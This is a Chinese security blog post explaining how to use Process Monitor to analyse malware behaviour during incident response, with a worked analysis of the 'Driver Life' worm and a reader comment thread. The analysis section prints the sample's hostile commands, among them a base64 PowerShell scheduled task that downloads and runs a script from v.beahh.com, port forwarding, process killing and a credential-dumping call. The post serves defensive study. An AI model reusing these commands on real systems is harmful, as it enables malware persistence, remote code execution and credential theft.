应急响应系列之利用ProcessMonitor进行恶意文件分析

枫少@KillBoy
枫少@KillBoy
管理员
220
文章
0
粉丝
资源分享9410,881字数 2696阅读8分59秒阅读模式
AI智能摘要
面对层出不穷的勒索、挖矿病毒,不懂逆向分析就只能束手无策?其实无需啃汇编代码,也能快速拆解恶意程序的真实行为。本文揭秘如何利用微软原生工具ProcessMonitor,零基础还原病毒的文件、注册表、网络和进程操作全过程,尤其以“驱动人生”病毒实战,展现从启动项植入到内网扩散的完整链条。掌握这套行为分析法,让你在应急响应中快速定位关键痕迹,实现精准清除。
— AI 生成的文章内容摘要

一、背景

最近几年,伴随着数字货币的兴起,促进了经济利益驱动型黑客行为的暴增。各位做安服和应急的小伙伴不可避免的会与各种勒索病毒、挖矿病毒以及各种蠕虫病毒打交道,通过分析各大厂发的技术文章, 其主要使用逆向分析还原原始代码来了解病毒相关的功能与特征。

但是对于没有逆向分析基础的同学,看上去会很吃力,并且单纯了解了相关病毒的特征,过段时间又出现了新的变种,导致根据原先病毒的特征与功能无法进行彻底的查杀干净。那么有没有比较好的方法,可以在不逆向的基础下还原病毒的主要行为特征,从而根据这些特征来进行处置呢?在前期的不断学习与实践中,发现可以通过ProcesMonitor这款工具来进行病毒行为的分析,当然除了ProcessMonitor外还有火绒剑以及各种工具的组合也可以实现这种效果,但是ProcesMonitor的微软原生、不需要安装、占用性能低、功能齐全等特点决定其整体分析效果相比其他软件好很多。

二、专杀原理

目前各大杀软与EDR厂商以及个人研究者针对不同的病毒,如Ramnit、驱动人生、Sality、飞客蠕虫都在推出自己的专杀工具,那么有没有小伙伴想过病毒专杀工具的原理呢?其实仔细想想也不复杂,其专杀的核心逻辑如下所示:

1.  分析病毒的功能特征(文件行为、注册表行为、网络行为、进程操作等),这一块是专杀的核心要点,必须把病毒的行为分析透彻

2.  针对病毒的相应行为进行反制,如病毒在c:/windows/下创建了1.exe文件,专杀就是到c:/windows/下找到这个文件并删除(根据MD5判断是否是同一个文件)

说起来很简单,但是在真实的实战中,需要病毒专杀作者深入分析病毒的功能特征,并且完善相应代码来进行查杀。但是在真实的场景下存在各种问题导致专杀查杀不彻底,这个时候就需要根据其特征来进行手工清除。

三、核心功能

回归正题,我们来分析一下ProcessMonitor的主要功能:

注册表行为分析

文件行为分析

网络行为分析

进程行为分析

3.1 注册表行为分析

主要分析针对注册表的以下行为

打开注册表表项

创建注册表表项

创建注册表键值

设置注册表表项

设置注册表键值

删除注册表表项

删除注册表键值

查询注册表表项

查询注册表键值

枚举注册表表项

枚举键值

……

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片1

直接使用过滤注册表的行为,我们可以看到相关进程对注册表的操作行为。这个时候可以进行过滤,个人感觉过滤绝对是ProcessMonitor一个强大的功能。

过滤的可以针对具体的进程、操作方法、PID、结果等条件来进行单项或者组合过滤。

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片3

个人感觉在实战中用的比较多的针对注册表的操作行为有:

枚举注册表表项与键值

创建注册表表项与键值

设置键值

删除注册表表项与键值

修改注册表键值

……

我们直接过滤regsetvalue,可以看到过滤后的信息如下:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片5

我们将其打开,可以看到其对注册表的相关操作。

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片7

另外,也可以通过RegShot这个工具来比较注册表的变化情况,其在病毒运行前和运行后可运行一次,通过对比病毒运行前后注册表的变化来分析病毒针对注册表的操作。

3.2 文件行为分析

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片9

主要的针对文件操作的行为有:

创建文件

删除文件

复制文件

锁定文件

隐蔽文件

读写文件

……

3.3 网络行为分析

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片10

这一块个人感觉功能相对较弱,只能看到TCP五元组信息与应用层交互的统计信息,无法看到详细交互的内容。这一块,虽然通过流量可以看到病毒程序所连接的对方的IP、端口以及部分统计信息,但是无法深入分析其交互的具体内容。个人还是建议使用wireshark或tshark来过滤网络的流量,这样后续可以深入分析原始的内容,以了解病毒程序主要的行为特征。

3.4 进程与线程行为分析

这一块是病毒分析的重点,需要深入分析与关注。一般情况下,病毒程序释放的时候会创建相应的进程、线程等。相应的进程、线程会进行不同的操作。一般情况下,各种挖矿病毒除了主流的挖矿功能外,还会加上蠕虫传播的特性,这样的话会释放不同的功能模板,如SMB爆破模板、永恒之蓝漏洞利用模板、RDP爆破模板等。这里面相关进程与线程的创建与其相关的特征通过进程与线程这个功能模板都可以进行深入的分析。

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片12

另外,ProcessMonitor还有一个比较好的功能特征,就是show process tree,以树结构的形式来显示相应的进程,这个功能非常直观友好,一图胜千言,直接上图:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片14

四、病毒实战

4.1 概述

在这里面我们以前段时间比较流行的驱动人生病毒来分析其主要的功能特征,释放病毒时主要运行setup-install.exe和svchost.exe即可,相应的病毒样本如下所示:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片16

为了验证通过使用ProcessMonitor分析病毒功能特征的完整性,我们找了吾爱破解上的一篇分析比较齐全的针对驱动人生的分析文章,相应链接如下:

https://www.52pojie.cn/thread-983519-1-1.html

运行setup-install.exe和svchost.exe病毒样本以后,使用ProcessMonitor捕捉的样本保存后,我们来进行分析:

4.2  进程分析

4.2.1   setup-install.exe功能分析

直接使用show processtree的功能,可以看到setup-install.exe的主要功能如下:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片18

将其过滤以后,功能如下:

#查询与启动服务

sc  start Schedule

sc  query Schedule

netstart WebServers

#删除原有的WebServers并创建新的WebServers定时任务

start/b sc start Schedule&ping localhost&sc query Schedule|findstrRUNNING&&(schtasks /delete /TN WebServers /f&schtasks /create /rusystem /sc MINUTE /mo 50 /ST 07:00:00 /TN WebServers /tr “cmd.exe /cc:/windows/SysWOW64/wmiex.exe”&schtasks /run /TN WebServers)

#终止svhost.exe、svhhost.exe、svvhost.exe、wmiex.exe进程

taskkill/f /im svhost.exe /im svhhost.exe /im svvhost.exe & move /yc:/windows/temp/svvhost.exe c:/windows/temp/svchost.exe & delc:/windows/system32/svhhost.exe & del c:/windows/syswow64/svhhost.exe

taskkill/f /im wmiex.exe

#wmic删除相应的进程

wmic  process where “name=’svhost.exe’ orname=’svhhost.exe’ or name=’svvhost.exe’” delete

wmic  process where “ExecutablePath like’%drivers%’ and name=’taskmgr.exe’” delete

wmic  process where “ExecutablePath like’%drivers%’ and name=’svchost.exe’” delete

wmic  process where “ExecutablePath like’%emp%’ and name=’svchost.exe’” delete

#创建端口转发策略,将本机65531-65533端口转发到1.1.1.1的53端口

netshinterface ipv6 install&netsh firewall add portopening tcp 65532 UDP

netshinterface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65531 UDP2

netshinterface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65533 ShareService

4.2.2   svchost.exe功能分析

同样,使用showprocess tree功能,可以看出,svchost.exe的主要功能如下所示:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片20

过滤相应的command,其执行的进程与命令如下所示:

#创建防火墙策略,阻断访问本地TCP 445

netuser&netsh advfirewall set allprofile state on&netsh advfirewallfirewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445

#创建名为DnsScan的定时任务,每一小时运行一次,主要运行C:/Windows/temp/svchost.exe文件

schtasks/create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr”C:/Windows/temp/svchost.exe” /F

#创建powershell定时任务,base64解码后,其脚本为IEX (New-ObjectNet.WebClient).downloadstring(‘http://v.beahh.com/v‘+$env:USERDOMAIN)

schtasks/create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn”/microsoft/windows/Bluetooths” /tr “powershell -ep bypass -eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=”/F

#执行powershell加载m.ps1获取系统密码实现内网传染

C:/Windows/SysNative/WindowsPowerShell/v1.0/powershell.exe-exec bypass “import-module c:/windows/temp/m.ps1;Invoke-Cats -pwds”

#获取域名与用户

wmicntdomain get domainname

netuser

4.3 文件行为分析

Setup-install.exe创建ttt.exe文件,并设置隐藏属性

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片22

4.4 注册表行为分析

创建两个启动项

1.创建名为Ddriver启动项,加载c:/windows/SysWOW64/drivers/svchost.exe

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片24

2.创建名为WebServers的启动项,启动加载c:/windows/SysWOW64/wmiex.exe

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片26

4.5 网络行为分析

前面说过通过ProcessMonitor的网络行为分析,只能看到相应的五无组信息,无法分析到交互的数据包内容。通过分析,可以看到交互的部分连接五元组信息如下所示:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片28

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片30

去重后,可以看到和以下域名进行通信

42.pl

72.52.179.174

li1176-20.members.linode.com

li1176-20.members.linode.com

mail411.us2.mcsv.net

看了一下,网络通信这一块还有好多地址没有抓到,可能和样本释放程度有关系。大家可以在虚拟机上运行一段时间,把样本全部释放以后再分析一下。

4.6  对比

将样本上传到微步中,相关链接如下:

https://s.threatbook.cn/report/file/bdbfa96d17c2f06f68b3bcc84568cf445915e194f130b0dc2411805cf889b6cc/?sign=history&env=win7_sp1_enx86_office2013

https://s.threatbook.cn/report/file/60b6d7664598e6a988d9389e6359838be966dfa54859d5cb1453cbc9b126ed7d/?env=win7_sp1_enx86_office2013

借用微步的一张截图来分析其行为:

应急响应系列之利用ProcessMonitor进行恶意文件分析-图片32应急响应系列之利用ProcessMonitor进行恶意文件分析-图片32

五、总结

通过上面的实战可以看出,在不熟悉逆向或者因为样本对抗导致难以逆向的时候使用ProcessMonitor可以快速的分析病毒的行为,在一定程度上提高了分析的效率与质量。其具有以下特点:

不需要专业的逆向与反汇编技能

上手快、效果好

……

但是以下下面情况无法使用或分析不全:

反虚拟机

反沙箱

 ……

总的来说,不是一款不错的病毒分析工具。

六、参考

https://www.52pojie.cn/thread-983519-1-1.html

https://s.threatbook.cn/report/file/60b6d7664598e6a988d9389e6359838be966dfa54859d5cb1453cbc9b126ed7d/?env=win7_sp1_enx86_office2013

https://s.threatbook.cn/report/file/bdbfa96d17c2f06f68b3bcc84568cf445915e194f130b0dc2411805cf889b6cc/?sign=history&env=win7_sp1_enx86_office2013

样本

链接:https://pan.baidu.com/s/1fLaxstvUEDa8_r3eY4q38w

提取码:0evl

https://www.freebuf.com/sectool/234417.html

 
枫少@KillBoy
评论  94  访客  94
    • 泡泡小甜心
      泡泡小甜心 1

      之前搞过挖矿病毒分析,ProcessMonitor确实省事多了

      • MochiMunch
        MochiMunch 0

        火绒剑也还行吧,但还是觉得ProcMon更稳一点

          • 雷霆工坊
            雷霆工坊 0

            @ MochiMunch 我也觉得ProcMon更稳。

            • 隐形斗篷常驻民
              隐形斗篷常驻民 0

              @ MochiMunch ProcMon过滤功能强大,但有时漏掉细节,你们有遇到吗?

            • 泡泡芋泥
              泡泡芋泥 1

              注册表那块删键值的操作太骚了,直接干掉启动项?

                • 甜甜
                  甜甜 0

                  @ 泡泡芋泥 确实删键值挺直接。

                  • 梦呓拾荒
                    梦呓拾荒 0

                    @ 泡泡芋泥 这个端口转发好像想躲避检测。

                    • 烈日之冠
                      烈日之冠 0

                      @ 泡泡芋泥 我之前踩过类似的注册表坑。

                      • 墨穹
                        墨穹 1

                        @ 泡泡芋泥 我试过把setup-install.exe跑在没有网的环境,结果发现它的端口转发根本没生效,说明它依赖外部服务器才能完成持久化,真是让人哭笑不得。

                      • 凡尔赛
                        凡尔赛 0

                        setup-install.exe那个端口转发是几个意思,65532转53?看不懂

                          • 墨烬
                            墨烬 0

                            @ 凡尔赛 所以那端口转53,就是为了绕过检测吧?

                          • 奶香曲奇
                            奶香曲奇 1

                            微步的报告看着比本地抓的全,是不是样本没跑完?

                              • 晨雾轻
                                晨雾轻 0

                                @ 奶香曲奇 微步跑得久,行为自然多,咱们本地可能没等它完全释放。

                              • 青瓷映雪
                                青瓷映雪 0

                                树形进程图是真的直观,一上来就看到svchost被反复杀

                                  • 蜜桃宝宝
                                    蜜桃宝宝 0

                                    @ 青瓷映雪 svchost被反复杀说明它在自保机制上下了功夫

                                    • 寂灭之心
                                      寂灭之心 1

                                      @ 青瓷映雪 树状图确实直观,父子进程一目了然

                                    • 数据流大师
                                      数据流大师 1

                                      powershell定时任务base64那段能解出来看看吗?想确认下载荷

                                        • 冷静的冰山
                                          冷静的冰山 0

                                          @ 数据流大师 base64解出来就是下载远程脚本,IEX那套老把戏了。

                                        • 纸飞机少年
                                          纸飞机少年 0

                                          这个DnsScan任务每小时跑一次,持久性拉满了啊

                                            • 焦虑的兔子
                                              焦虑的兔子 0

                                              @ 纸飞机少年 DnsScan这定时任务藏得够深,系统启动项都搞上了

                                            • 妖风四起
                                              妖风四起 0

                                              网络行为只能看五元组有点难受,还得搭Wireshark补一手

                                                • Celestial Storm
                                                  Celestial Storm 0

                                                  @ 妖风四起 五元组信息太碎片化了。

                                                  • 未来旅人
                                                    未来旅人 0

                                                    @ 妖风四起 DnsScan每小时跑,真是持久。

                                                    • Amber Lotus
                                                      Amber Lotus 0

                                                      @ 妖风四起 Wireshark配合才够用。

                                                      • 果酱布丁
                                                        果酱布丁 0

                                                        @ 妖风四起 对那个base64的powershell脚本,我解码后看到下载链接,真怕被忽视。

                                                        • 棉花小熊猫
                                                          棉花小熊猫 1

                                                          @ 妖风四起 Wireshark确实得跟上,不然payload根本摸不着

                                                        • 寒璃
                                                          寒璃 0

                                                          这工具省事是省事,但反虚拟机直接GG了吧

                                                            • 红尘剑仙
                                                              红尘剑仙 0

                                                              @ 寒璃 是啊,虚拟机里直接挂了,ProcMon没法跑。🤔

                                                            • Storm Phoenix
                                                              Storm Phoenix 0

                                                              树状图一开,父子进程全现形,太直观了

                                                                • 幻光秘语
                                                                  幻光秘语 0

                                                                  @ Storm Phoenix 树状图一展开,整个感染链都清晰了,谁是父谁是子一眼明。

                                                                • 火锅侠
                                                                  火锅侠 0

                                                                  火绒剑我用着卡顿,ProcMon轻量是真的香

                                                                  • 符咒低语
                                                                    符咒低语 0

                                                                    那个base64解完是下载远程脚本,v.beahh.com那个域名

                                                                      • 铁皮青蛙骑士
                                                                        铁皮青蛙骑士 1

                                                                        @ 符咒低语 这个域名我查过,似乎和一些恶意下载站点挂钩,真是让人担心。

                                                                      • 时间之沙
                                                                        时间之沙 1

                                                                        之前分析勒索病毒,也是靠ProcMon才定位到加密路径

                                                                          • 红袍传奇
                                                                            红袍传奇 0

                                                                            @ 时间之沙 端口转发转53是想伪装成DNS请求吧?

                                                                          • 沉静深邃
                                                                            沉静深邃 1

                                                                            注册表删键值不算骚,关键是它还重建了启动项

                                                                            • 星梦编织
                                                                              星梦编织 1

                                                                              微步报告数据多,可能是沙箱运行时间更长

                                                                                • 书影
                                                                                  书影 0

                                                                                  @ 星梦编织 本地抓不到全流量,可能样本没跑透

                                                                                • 团建逃亡冠军
                                                                                  团建逃亡冠军 1

                                                                                  setup-install.exe转53端口,怕不是想伪装DNS流量

                                                                                    • 汀洲白鹭
                                                                                      汀洲白鹭 0

                                                                                      @ 团建逃亡冠军 伪装DNS流量这招有点东西,不容易被发现。

                                                                                    • 深渊咏唱
                                                                                      深渊咏唱 0

                                                                                      之前搞过挖矿病毒,ProcMon确实省事多了

                                                                                      • Twilight Nomad
                                                                                        Twilight Nomad 0

                                                                                        火绒剑卡得要死,还是ProcMon轻量

                                                                                          • 社恐补给站
                                                                                            社恐补给站 0

                                                                                            @ Twilight Nomad 火绒剑太卡了,ProcMon真没得说。

                                                                                          • 薯片小王
                                                                                            薯片小王 0

                                                                                            那个base64解出来是远程下载脚本,v.beahh.com域名有点可疑

                                                                                            • 像素牧羊人
                                                                                              像素牧羊人 0

                                                                                              注册表删完又建启动项,这操作太阴了

                                                                                              • 蘑菇小屋
                                                                                                蘑菇小屋 1

                                                                                                微步报告看着更全,是不是本地跑的时间太短?

                                                                                                • 月隐剑圣
                                                                                                  月隐剑圣 0

                                                                                                  powershell定时任务每小时跑一次,持久化做得真狠

                                                                                                  • 琉璃之梦
                                                                                                    琉璃之梦 1

                                                                                                    这工具真省事,不用看汇编头都大了。

                                                                                                    • 暗夜独眼
                                                                                                      暗夜独眼 0

                                                                                                      这工具真香,不用逆向也能扒行为😂

                                                                                                      • 铜章客
                                                                                                        铜章客 1

                                                                                                        之前碰到一个变种,它会先把自己伪装成系统服务,然后再用ProcMon抓到的进程树直接定位到隐藏的svchost,最后手动删除了所有启动项才彻底清理。

                                                                                                        • Timeless Mirage
                                                                                                          Timeless Mirage 1

                                                                                                          挖矿病毒那会儿也是靠它抓到偷偷开的进程,不然根本发现不了。

                                                                                                          • 镖师阿虎
                                                                                                            镖师阿虎 1

                                                                                                            65532转53,这不就是伪装成DNS流量走外联?太狡猾了。

                                                                                                            • 雨巷琴声
                                                                                                              雨巷琴声 0

                                                                                                              注册表删键值还重建启动项,跟打地鼠似的,清完又冒。

                                                                                                              • 岁月的歌者
                                                                                                                岁月的歌者 1

                                                                                                                火绒剑用着卡,ProcMon开十来个日志都不带抖的。

                                                                                                                • 白鹭洲头
                                                                                                                  白鹭洲头 1

                                                                                                                  网络只能看五元组,关键数据看不到,还得搭Wireshark补。

                                                                                                                  • 糯米小团子
                                                                                                                    糯米小团子 0

                                                                                                                    之前分析勒索病毒,就是靠文件行为定位到加密目录的,救大命。

                                                                                                                    • 狂战士之怒
                                                                                                                      狂战士之怒 0

                                                                                                                      ProcessMonitor上手快这点确实,比看汇编简单多了。

                                                                                                                        • 星尘微步
                                                                                                                          星尘微步 0

                                                                                                                          @ 狂战士之怒 我第一次用ProcMon就马上定位了可疑进程,省了不少折腾。

                                                                                                                          • 徒步星
                                                                                                                            徒步星 1

                                                                                                                            @ 狂战士之怒 刚装完就能看进程树,省了好几天逆向的功夫,真是救命。

                                                                                                                          • 螃蟹壳壳
                                                                                                                            螃蟹壳壳 1

                                                                                                                            之前中了勒索病毒,就是用这个找到加密目录的,不然全完了。

                                                                                                                              • 茶香时光
                                                                                                                                茶香时光 1

                                                                                                                                @ 螃蟹壳壳 我之前也遇到类似勒索,靠ProcMon定位到加密文件夹,真是救命。

                                                                                                                              • 笑点收集器
                                                                                                                                笑点收集器 1

                                                                                                                                那个定时任务创建DnsScan每60分钟就跑一次,铁了心赖着不走啊。

                                                                                                                                • Lunar Phantom
                                                                                                                                  Lunar Phantom 0

                                                                                                                                  有没有试过搭配Sysmon一起用?感觉会更全面点。

                                                                                                                                  • Josephtug
                                                                                                                                    Josephtug 3

                                                                                                                                    阅读你的博客, 我体会到, 世界很美。由衷感谢 旅行气氛。 [url=https://iqvel.com/zh-Hans/a/%E5%A2%A8%E8%A5%BF%E5%93%A5/%E8%B0%A2%E5%B0%94%E5%93%88]度假勝地[/url] 有教育意义的 旅行者博客! 请继续保持!

                                                                                                                                    • White Heron
                                                                                                                                      White Heron 0

                                                                                                                                      微步那个报告确实全,可能是沙箱环境跑得久。

                                                                                                                                        • 独行狂
                                                                                                                                          独行狂 0

                                                                                                                                          @ White Heron 我也注意到报告里列的细节超多,感觉真的跟跑的时间长有关。

                                                                                                                                          • 孤旅诗人
                                                                                                                                            孤旅诗人 0

                                                                                                                                            @ White Heron 沙箱跑久点确实能抓到更多网络连接,我这边加了Wireshark才看到完整流量。

                                                                                                                                          • 千早奈绪
                                                                                                                                            千早奈绪 0

                                                                                                                                            过滤功能是真的强,能直接筛出关键操作。

                                                                                                                                            • 哐当哐当熊
                                                                                                                                              哐当哐当熊 0

                                                                                                                                              网络这块只能看个大概,还得上Wireshark抓包看详情。

                                                                                                                                              • 轻纱
                                                                                                                                                轻纱 0

                                                                                                                                                ProcessMonitor确实省事,不用看汇编

                                                                                                                                                • 鬼影随
                                                                                                                                                  鬼影随 0

                                                                                                                                                  那个端口转发65532转53是啥意思?

                                                                                                                                                  • 夜行羽翼
                                                                                                                                                    夜行羽翼 0

                                                                                                                                                    之前分析勒索病毒就靠它找到加密目录

                                                                                                                                                      • 风车梦
                                                                                                                                                        风车梦 1

                                                                                                                                                        @ 夜行羽翼 我也靠它抓到加密路径,省了不少手动排查时间。

                                                                                                                                                        • Meteor Muse
                                                                                                                                                          Meteor Muse 0

                                                                                                                                                          @ 夜行羽翼 加密目录那块我也被它锁住,后来用ProcMon追踪到隐藏文件才搞定。

                                                                                                                                                        • 末日漫游者
                                                                                                                                                          末日漫游者 1

                                                                                                                                                          powershell定时任务每小时跑一次真狠

                                                                                                                                                          • 雪球小软软
                                                                                                                                                            雪球小软软 0

                                                                                                                                                            火绒剑用着卡,还是这个轻量

                                                                                                                                                            • 清晨露珠
                                                                                                                                                              清晨露珠 1

                                                                                                                                                              过滤功能确实强大。

                                                                                                                                                              • 织女红
                                                                                                                                                                织女红 0

                                                                                                                                                                微步报告看着更全,本地可能没跑完

                                                                                                                                                                • 沉默的炮火
                                                                                                                                                                  沉默的炮火 0

                                                                                                                                                                  注册表删了又建启动项,跟打地鼠似的

                                                                                                                                                                  • 糖豆跳跳虎
                                                                                                                                                                    糖豆跳跳虎 1

                                                                                                                                                                    过滤功能强,能直接筛关键操作

                                                                                                                                                                    • 虚拟生态学家
                                                                                                                                                                      虚拟生态学家 0

                                                                                                                                                                      反虚拟机的话这工具就没用了吧

                                                                                                                                                                      • 按察使
                                                                                                                                                                        按察使 1

                                                                                                                                                                        驱动人生这病毒名起的,真够讽刺的

                                                                                                                                                                          • 霜冻法师
                                                                                                                                                                            霜冻法师 1

                                                                                                                                                                            @ 按察使 这名字取得太损了

                                                                                                                                                                          • 秋裤外穿侠
                                                                                                                                                                            秋裤外穿侠 0

                                                                                                                                                                            ProcMon真的省事,直接看到文件路径就够了。

                                                                                                                                                                            • 竹露清响
                                                                                                                                                                              竹露清响 0

                                                                                                                                                                              看了这篇,感觉作者把过程画得挺清晰的。

                                                                                                                                                                              • 科技狂想
                                                                                                                                                                                科技狂想 1

                                                                                                                                                                                我之前也用ProcMon定位过勒索的加密目录,救了系统。

                                                                                                                                                                                • 凡尔赛大师
                                                                                                                                                                                  凡尔赛大师 0

                                                                                                                                                                                  setup-install.exe里那个端口转发到底是想干嘛?

                                                                                                                                                                                  • 翠微亭外
                                                                                                                                                                                    翠微亭外 0

                                                                                                                                                                                    那如果病毒在沙箱里直接检测反虚拟机,ProcMon还能抓到啥?

                                                                                                                                                                                    • 情人巧克力
                                                                                                                                                                                      情人巧克力 0

                                                                                                                                                                                      配合Sysmon一起用,能把网络细节也补全。

                                                                                                                                                                                      • 银匠董廿六
                                                                                                                                                                                        银匠董廿六 1

                                                                                                                                                                                        ProcMon日志太多,过滤不够精准有点烦。

                                                                                                                                                                                        • 星星小鱼
                                                                                                                                                                                          星星小鱼 0

                                                                                                                                                                                          感觉还行。

                                                                                                                                                                                          • 春樱物语
                                                                                                                                                                                            春樱物语 0

                                                                                                                                                                                            这工具真香,安服必备 👍

                                                                                                                                                                                            • 沉默的雷
                                                                                                                                                                                              沉默的雷 1

                                                                                                                                                                                              谁还能把这个脚本手敲出来的,佩服。

                                                                                                                                                                                              • 爱放屁的河马
                                                                                                                                                                                                爱放屁的河马 1

                                                                                                                                                                                                ProcMon的树状图确实直观多了

                                                                                                                                                                                              匿名

                                                                                                                                                                                              发表评论

                                                                                                                                                                                              匿名网友

                                                                                                                                                                                              拖动滑块以完成验证